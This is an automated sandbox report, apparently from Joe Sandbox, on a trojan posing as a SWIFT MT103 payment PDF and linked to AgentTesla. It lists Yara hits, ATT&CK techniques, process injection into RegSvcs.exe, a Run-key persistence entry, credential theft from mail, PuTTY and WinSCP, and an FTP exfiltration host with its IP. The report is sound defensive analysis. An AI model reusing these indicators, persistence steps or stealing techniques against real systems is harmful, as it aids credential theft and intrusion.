              Source: Yara matchFile source: 00000001.00000002.4155397178.0000000002A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4155100124.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4155829355.0000000002BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4156259862.0000000002CD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4160367677.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6584, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2be0000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.280fe06.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2a10ee8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.3cd5390.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.3cd5390.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2810cee.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2a10000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2a10000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.280fe06.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2810cee.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2a10ee8.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2be0000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.4155397178.0000000002A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4155100124.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4155829355.0000000002BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4156259862.0000000002CD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4160367677.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6584, type: MEMORYSTR
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2be0000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.280fe06.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2a10ee8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.3cd5390.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.3cd5390.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2810cee.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2a10000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2a10000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.280fe06.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2810cee.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2a10ee8.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.RegSvcs.exe.2be0000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.4155397178.0000000002A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4155100124.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4155829355.0000000002BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4160367677.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_004741BB
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,0_2_0046483C
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0047AD92
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure2
              Valid Accounts
              121
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              Exploitation for Privilege Escalation
              11
              Disable or Modify Tools
              2
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services11
              Archive Collected Data
              2
              Ingress Tool Transfer
              1
              Exfiltration Over Alternative Protocol
              1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Native API
              2
              Valid Accounts
              1
              DLL Side-Loading
              11
              Deobfuscate/Decode Files or Information
              221
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol2
              Data from Local System
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt1
              Registry Run Keys / Startup Folder
              2
              Valid Accounts
              2
              Obfuscated Files or Information
              1
              Credentials in Registry
              2
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
              Access Token Manipulation
              1
              Software Packing
              NTDS148
              System Information Discovery
              Distributed Component Object Model221
              Input Capture
              2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
              Process Injection
              1
              DLL Side-Loading
              LSA Secrets341
              Security Software Discovery
              SSH3
              Clipboard Data
              23
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
              Registry Run Keys / Startup Folder
              1
              Masquerading
              Cached Domain Credentials141
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
              Valid Accounts
              DCSync2
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
              Virtualization/Sandbox Evasion
              Proc Filesystem11
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
              Access Token Manipulation
              /etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
              Process Injection
              Network Sniffing1
              System Network Configuration Discovery
              Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
              Hidden Files and Directories
              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1544202 Sample: z20SWIFT_MT103_Payment_5520... Startdate: 29/10/2024 Architecture: WINDOWS Score: 100 25 ftp.haliza.com.my 2->25 27 api.ipify.org 2->27 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 8 other signatures 2->47 7 z20SWIFT_MT103_Payment_552016_pdf.exe 1 2->7         started        10 sgxIb.exe 2 2->10         started        12 sgxIb.exe 1 2->12         started        signatures3 process4 signatures5 49 Writes to foreign memory regions 7->49 51 Maps a DLL or memory area into another process 7->51 53 Switches to a custom stack to bypass stack traces 7->53 55 Contains functionality to detect sleep reduction / modifications 7->55 14 RegSvcs.exe 16 4 7->14         started        19 conhost.exe 10->19         started        21 conhost.exe 12->21         started        process6 dnsIp7 29 ftp.haliza.com.my 110.4.45.197, 21, 49731, 49732 EXABYTES-AS-APExaBytesNetworkSdnBhdMY Malaysia 14->29 31 api.ipify.org 104.26.12.205, 443, 49730 CLOUDFLARENETUS United States 14->31 23 C:\Users\user\AppData\Roaming\...\sgxIb.exe, PE32 14->23 dropped 33 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->33 35 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->35 37 Tries to steal Mail credentials (via file / registry access) 14->37 39 4 other signatures 14->39 file8 signatures9

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              z20SWIFT_MT103_Payment_552016_pdf.exe24%ReversingLabsWin32.Trojan.AutoitInject
              z20SWIFT_MT103_Payment_552016_pdf.exe28%VirustotalBrowse
              z20SWIFT_MT103_Payment_552016_pdf.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe0%ReversingLabs
              C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe0%VirustotalBrowse
              No Antivirus matches
              SourceDetectionScannerLabelLink
              api.ipify.org0%VirustotalBrowse
              ftp.haliza.com.my1%VirustotalBrowse
              SourceDetectionScannerLabelLink
              https://api.ipify.org/0%URL Reputationsafe
              https://api.ipify.org0%URL Reputationsafe
              https://account.dyn.com/0%URL Reputationsafe
              https://api.ipify.org/t0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://ftp.haliza.com.my1%VirustotalBrowse
              http://crl.microsoft.co1%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              api.ipify.org
              104.26.12.205
              truefalseunknown
              ftp.haliza.com.my
              110.4.45.197
              truetrueunknown
              NameMaliciousAntivirus DetectionReputation
              https://api.ipify.org/false
              • URL Reputation: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://api.ipify.orgRegSvcs.exe, 00000001.00000002.4155397178.0000000002A10000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4155100124.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4155829355.0000000002BE0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4156259862.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4160367677.0000000003C81000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://account.dyn.com/RegSvcs.exe, 00000001.00000002.4155397178.0000000002A10000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4155100124.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4155829355.0000000002BE0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4160367677.0000000003C81000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://ftp.haliza.com.myRegSvcs.exe, 00000001.00000002.4156259862.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4156259862.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4156259862.0000000002F07000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              https://api.ipify.org/tRegSvcs.exe, 00000001.00000002.4156259862.0000000002C81000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000001.00000002.4156259862.0000000002C81000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://crl.microsoft.coRegSvcs.exe, 00000001.00000002.4161341051.0000000005659000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              104.26.12.205
              api.ipify.orgUnited States
              13335CLOUDFLARENETUSfalse
              110.4.45.197
              ftp.haliza.com.myMalaysia
              46015EXABYTES-AS-APExaBytesNetworkSdnBhdMYtrue
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1544202
              Start date and time:2024-10-29 02:31:05 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 9m 6s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:10
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:z20SWIFT_MT103_Payment_552016_pdf.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@7/5@2/2
              EGA Information:
              • Successful, ratio: 50%
              HCA Information:
              • Successful, ratio: 95%
              • Number of executed functions: 44
              • Number of non-executed functions: 310
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target sgxIb.exe, PID 3740 because it is empty
              • Execution Graph export aborted for target sgxIb.exe, PID 3748 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              TimeTypeDescription
              01:32:06AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sgxIb C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
              01:32:15AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sgxIb C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
              21:32:02API Interceptor13032869x Sleep call for process: RegSvcs.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              104.26.12.205Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
              • api.ipify.org/
              6706e721f2c06.exeGet hashmaliciousRemcosBrowse
              • api.ipify.org/
              perfcc.elfGet hashmaliciousXmrigBrowse
              • api.ipify.org/
              SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
              • api.ipify.org/
              SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
              • api.ipify.org/
              hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
              • api.ipify.org/
              file.exeGet hashmaliciousRDPWrap ToolBrowse
              • api.ipify.org/
              file.exeGet hashmaliciousUnknownBrowse
              • api.ipify.org/
              file.exeGet hashmaliciousUnknownBrowse
              • api.ipify.org/
              file.exeGet hashmaliciousUnknownBrowse
              • api.ipify.org/
              110.4.45.197Order Specifications for Materials.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                z14Employee_Contract_pdf.exeGet hashmaliciousAgentTeslaBrowse
                  Order Specifications for Materials.docx.exeGet hashmaliciousAgentTeslaBrowse
                    DHL_Shipment_Details_8th_October.pdf.exeGet hashmaliciousAgentTeslaBrowse
                      z92BankPayment38_735.exeGet hashmaliciousAgentTeslaBrowse
                        Bank Payment $38,735.exeGet hashmaliciousAgentTeslaBrowse
                          rQuotation3200025006.exeGet hashmaliciousAgentTeslaBrowse
                            z38PO_20248099-1_pdf.exeGet hashmaliciousAgentTeslaBrowse
                              z64MT103_126021720924_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                rPO_20248099-112,300PCS.exeGet hashmaliciousAgentTeslaBrowse
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  api.ipify.orgfile.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                  • 172.67.74.152
                                  Remittance Receipt.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.12.205
                                  SecuriteInfo.com.Win64.Malware-gen.4046.15809.exeGet hashmaliciousEICARBrowse
                                  • 104.26.13.205
                                  SecuriteInfo.com.Win64.Malware-gen.4046.15809.exeGet hashmaliciousUnknownBrowse
                                  • 104.26.12.205
                                  SUNNY HONG VSL PARTICULARS.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 172.67.74.152
                                  SecuriteInfo.com.Trojan.Inject5.10837.16335.2292.exeGet hashmaliciousAgentTeslaBrowse
                                  • 172.67.74.152
                                  Rampage.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                  • 104.26.13.205
                                  Order Specifications for Materials.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 104.26.12.205
                                  https://pub-535a4999ab4b4c1e81647bad9b888e40.r2.dev/onedrivefresh.htmlGet hashmaliciousUnknownBrowse
                                  • 172.67.74.152
                                  ftp.haliza.com.myOrder Specifications for Materials.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 110.4.45.197
                                  z14Employee_Contract_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                  • 110.4.45.197
                                  Order Specifications for Materials.docx.exeGet hashmaliciousAgentTeslaBrowse
                                  • 110.4.45.197
                                  DHL_Shipment_Details_8th_October.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                  • 110.4.45.197
                                  z92BankPayment38_735.exeGet hashmaliciousAgentTeslaBrowse
                                  • 110.4.45.197
                                  Bank Payment $38,735.exeGet hashmaliciousAgentTeslaBrowse
                                  • 110.4.45.197
                                  rQuotation3200025006.exeGet hashmaliciousAgentTeslaBrowse
                                  • 110.4.45.197
                                  z38PO_20248099-1_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                  • 110.4.45.197
                                  z64MT103_126021720924_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                  • 110.4.45.197
                                  rPO_20248099-112,300PCS.exeGet hashmaliciousAgentTeslaBrowse
                                  • 110.4.45.197
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  CLOUDFLARENETUSSecuriteInfo.com.W64.GenKryptik.GHEK.tr.25144.16407.exeGet hashmaliciousUnknownBrowse
                                  • 104.26.0.5
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 188.114.97.3
                                  https://api.inspectrealestate.com.au/email/track?eta=1&t=B32-5UARLGTXC6GHXC7PJPHCGUP7HMF6FJEQ76L6MOL7WYB6P6EYQNBONANBBGKOXFRO3HPDET5TXGOZXG5FJNMJJC437YUYUWDF5VEVIWPK6LECEZJV3OMRCXF6VI76ZOGYOFIOERVACTHYB4KHK22IKKEWLYPTUBLONXLA7QVY2SW2TZMW4ULVG2UAKDR3DM3RL4TTJAF3F3ROXQ3ZLRVYS7Z2T4TIQETEEUV73V42AQLF65YKSUX6JMYEW3ZHXPREAMXXBOQV32GKOYOISFZKX4GPTPR2IMSMCULLR2V4QUSMU3MWF7NQ%3D%3D%3D%3DGet hashmaliciousUnknownBrowse
                                  • 188.114.96.3
                                  Payment Advice.xlsGet hashmaliciousUnknownBrowse
                                  • 104.21.21.60
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 188.114.96.3
                                  https://hianime.toGet hashmaliciousUnknownBrowse
                                  • 104.21.11.245
                                  (No subject) (98).emlGet hashmaliciousHTMLPhisherBrowse
                                  • 104.17.25.14
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 188.114.97.3
                                  https://mail.kb4.io/XT0VNMzRJS3djRnBKZnFha1JaVThBUHFHRmpuS2FmSUY4aUszUlY3Sm0rWmpyUWR3ekQzL2xjN0xhVVJlTzhvZzgyMGtTUkxmSWtGdWlUY2I0NStmRWlLS2xHcGZsNTZUN3VyanNiKzVaNjhaeTRSTXFXVGdwc0J4amUxRFFPMU5DTTd5ejl5aXZxUlBwL1NDaDBRSk9DWVJkc09KRUZodTl0SFh5bFVVWEdYZTMzcm5ZTCtCSGpmZWRIMEprQjhiZExvOE9wSGkwUS9KTjQwSVdjQT0tLVBNYWNLTzcyT0xCdDkzb3ItLURlVmNvdGI3d3BGenM5UWJzc1EreXc9PQ==?cid=2260646675Get hashmaliciousUnknownBrowse
                                  • 104.18.90.62
                                  https://mail.kb4.io/XV2pCbFUvdkZ0U1V3cHZQWXpqL3hjTU9wcmY4ZmEyNXZRWTRiU1VvMTVwRnRrYWdnVjdlM0lLQ3VmVXlCSlpGdkkvQUNJWjZLaHpVWnRmYjY0VktjbmJLUFlpV0xzWTVEdkJsa1hrWXY0dGZHMUNoclZ3aDRORWlpQlNhTlpLSy9pdXMwQXozSHVrYSthQnJrS2J6T0EvSVBMYUFYRG1EZ254WlBRUGdyZU55TkdBZjB0aWhCMFdIN081T2RsdFFIMVpIdFAvU2Q2NXlLKzNJY1JZQ1JNMTBwaDlZPS0tNE01L0hRZXp6Tm50TW1MTS0tSlkrYWNuVllJcXZpelZWZ2ppaVRSdz09?cid=2260646675Get hashmaliciousUnknownBrowse
                                  • 104.18.89.62
                                  EXABYTES-AS-APExaBytesNetworkSdnBhdMYOrder Specifications for Materials.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 110.4.45.197
                                  z14Employee_Contract_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                  • 110.4.45.197
                                  Order Specifications for Materials.docx.exeGet hashmaliciousAgentTeslaBrowse
                                  • 110.4.45.197
                                  na.elfGet hashmaliciousMiraiBrowse
                                  • 203.142.6.25
                                  05NN8zSK04.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 103.6.198.178
                                  file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                  • 103.6.198.219
                                  DHL_Shipment_Details_8th_October.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                  • 110.4.45.197
                                  file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                  • 103.6.198.219
                                  z92BankPayment38_735.exeGet hashmaliciousAgentTeslaBrowse
                                  • 110.4.45.197
                                  Bank Payment $38,735.exeGet hashmaliciousAgentTeslaBrowse
                                  • 110.4.45.197
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  3b5074b1b5d032e5620f69f9f700ff0ehttps://mail.kb4.io/XT0VNMzRJS3djRnBKZnFha1JaVThBUHFHRmpuS2FmSUY4aUszUlY3Sm0rWmpyUWR3ekQzL2xjN0xhVVJlTzhvZzgyMGtTUkxmSWtGdWlUY2I0NStmRWlLS2xHcGZsNTZUN3VyanNiKzVaNjhaeTRSTXFXVGdwc0J4amUxRFFPMU5DTTd5ejl5aXZxUlBwL1NDaDBRSk9DWVJkc09KRUZodTl0SFh5bFVVWEdYZTMzcm5ZTCtCSGpmZWRIMEprQjhiZExvOE9wSGkwUS9KTjQwSVdjQT0tLVBNYWNLTzcyT0xCdDkzb3ItLURlVmNvdGI3d3BGenM5UWJzc1EreXc9PQ==?cid=2260646675Get hashmaliciousUnknownBrowse
                                  • 104.26.12.205
                                  setup.exeGet hashmaliciousUnknownBrowse
                                  • 104.26.12.205
                                  setup.exeGet hashmaliciousUnknownBrowse
                                  • 104.26.12.205
                                  dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 104.26.12.205
                                  V9fubyadY6.exeGet hashmaliciousQuasarBrowse
                                  • 104.26.12.205
                                  (No subject) (93).emlGet hashmaliciousHTMLPhisherBrowse
                                  • 104.26.12.205
                                  https://onedrive.live.com/view.aspx?resid=8656653D19C3C7C0!sb98dbf79ab614921877689e4912e2fae&migratedtospo=true&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy84NjU2NjUzZDE5YzNjN2MwL0VubV9qYmxocXlGSmgzYUo1SkV1TDY0QmtKQzA5SEFwTjV6cTh1YW5PSWxxNEE_ZT1pdGFpeGo&wd=target%28Sezione%20senza%20titolo.one%7Ccfe57f3b-5d7b-4d15-b045-f6fdb53b3776%2FRechnung%2039920898-43006843%20%5C%7C%20Ebner%20Media%20Group%7C205becae-dae9-4a36-907a-485bcab69387%2F%29&wdorigin=NavigationUrlGet hashmaliciousUnknownBrowse
                                  • 104.26.12.205
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 104.26.12.205
                                  https://1drv.ms/o/c/dfbe417e0dc15e08/Esl_LBLy3yNEou5UFJ-QxnIBMGmncz8uv1GwgEHKevm1cw?e=C2cldFGet hashmaliciousUnknownBrowse
                                  • 104.26.12.205
                                  https://gofile.io/d/IAr464Get hashmaliciousPhisherBrowse
                                  • 104.26.12.205
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeOrder Specifications for Materials.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    9348000 EDT8 EDQ-905.pdf.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                      New_Order_568330_Material_Specifications.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWormBrowse
                                        Dokument_2024-10-24_135211.exeGet hashmaliciousXWormBrowse
                                          z14Employee_Contract_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                            purchase order.exeGet hashmaliciousXWormBrowse
                                              M.BL CSLEBKK2311030B.exeGet hashmaliciousAgentTeslaBrowse
                                                PO #89230.exeGet hashmaliciousAgentTeslaBrowse
                                                  FZCO - PO#12345.exeGet hashmaliciousAgentTeslaBrowse
                                                    POX455U90897QD.exeGet hashmaliciousXWormBrowse
                                                      Process:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):142
                                                      Entropy (8bit):5.090621108356562
                                                      Encrypted:false
                                                      SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
                                                      MD5:8C0458BB9EA02D50565175E38D577E35
                                                      SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                                      SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                                      SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                      Process:C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):271360
                                                      Entropy (8bit):7.9152811861644805
                                                      Encrypted:false
                                                      SSDEEP:6144:DfRdN8GCwuGfoypa08qEZi37shkidyFOzlYpef9GP1n8d8qz:DfzeGCwZL58/iRuzlS49gw3z
                                                      MD5:E1950C580F851C7BB78075120DEE9028
                                                      SHA1:FD9AE5F9F751BA8DCA5A030F73D0108548467C2D
                                                      SHA-256:DFB88C81CE070B890E22F97CCCD77E128B9B1978DCCCA74D69EB500B0D716154
                                                      SHA-512:8CCB3B22EB6E18C8EFDD43CD7CFAFD45981E2A1CCF11898E35355AA4A3B6902D1FC162AC25DD458B4F66AC5B3BAE13F7A591632E4A493AC297E1E422D6827ECE
                                                      Malicious:false
